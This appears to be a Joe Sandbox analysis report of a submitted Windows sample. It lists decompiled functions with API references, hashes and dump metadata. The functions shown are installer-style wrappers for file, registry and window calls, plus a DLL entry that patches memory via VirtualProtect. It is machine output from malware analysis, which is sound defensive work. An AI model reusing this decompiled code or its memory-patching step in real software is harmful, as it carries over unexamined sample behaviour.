                                                          C-Code - Quality: 100%
                                                          			E004057FC(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                          0x00405802
                                                          0x0040580a
                                                          0x00000000
                                                          0x00405810
                                                          0x00000000

                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74D0FAA0,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                          • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                          • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 33%
                                                          			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061AC(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406193();
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}










                                                          0x004027e9
                                                          0x004027e9
                                                          0x004027ea
                                                          0x004027f2
                                                          0x004027f7
                                                          0x004027f8
                                                          0x00402807
                                                          0x00402810
                                                          0x00402a61
                                                          0x00402a62
                                                          0x00402a65
                                                          0x00402a65
                                                          0x00402810
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                            • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
                                                          • Instruction ID: 8e859e92f5722eba9353145e96b7f7bbf63091ba891c9fc52d729c0f29c6f3b3
                                                          • Opcode Fuzzy Hash: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
                                                          • Instruction Fuzzy Hash: A0E09271E00104AFDB11EFA5AE498AE7779DB40304B14403BF101F51D2CA790D128E2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                          0x00402306
                                                          0x00402306
                                                          0x00402308
                                                          0x0040230c
                                                          0x0040230f
                                                          0x00402314
                                                          0x00402319
                                                          0x00402322
                                                          0x00402322
                                                          0x00402327
                                                          0x00402330
                                                          0x00402330
                                                          0x0040233d
                                                          0x004015b4
                                                          0x004015b6
                                                          0x00402885
                                                          0x00402885
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                          • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004060E7(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                          0x004060f1
                                                          0x004060fa
                                                          0x00406110
                                                          0x00000000
                                                          0x00406110
                                                          0x004060fe
                                                          0x00000000

                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405DC1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                          0x00405dc5
                                                          0x00405dd5
                                                          0x00405ddd
                                                          0x00000000
                                                          0x00405de4
                                                          0x00000000
                                                          0x00405de6

                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405DF0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                          0x00405df4
                                                          0x00405e04
                                                          0x00405e0c
                                                          0x00000000
                                                          0x00405e13
                                                          0x00000000
                                                          0x00405e15

                                                          APIs
                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}



                                                          0x100027cb
                                                          0x100027d0
                                                          0x100027e0
                                                          0x100027e8
                                                          0x100027ef
                                                          0x100027f4
                                                          0x100027f9
                                                          0x100027fe
                                                          0x10002803
                                                          0x10002808
                                                          0x1000280d
                                                          0x1000280d
                                                          0x10002815

                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004060B9(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                          0x004060c3
                                                          0x004060ca
                                                          0x004060dd
                                                          0x00000000
                                                          0x004060dd
                                                          0x004060ce
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,Call,?), ref: 004060DD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                          0x004015ae
                                                          0x004015b4
                                                          0x004015b6
                                                          0x00402885
                                                          0x00402885
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
                                                          • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                          • Opcode Fuzzy Hash: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
                                                          • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040422D(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291d8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                          0x0040422d
                                                          0x00404234
                                                          0x0040423f
                                                          0x00000000
                                                          0x0040423f
                                                          0x00404245

                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
